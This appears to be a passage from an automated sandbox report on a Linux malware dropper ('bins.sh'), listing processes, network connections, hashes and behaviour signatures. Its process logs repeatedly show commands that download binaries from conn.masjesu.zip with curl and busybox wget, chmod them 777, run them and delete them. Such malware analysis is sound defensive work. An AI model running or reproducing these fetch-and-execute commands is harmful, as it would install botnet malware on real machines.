[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-3 | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-3 | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | 0.debian.pool.ntp.org | udp |
Files
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:33
Platform
debian12-mipsel-20240221-en
Max time kernel
45s
Max time network
50s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
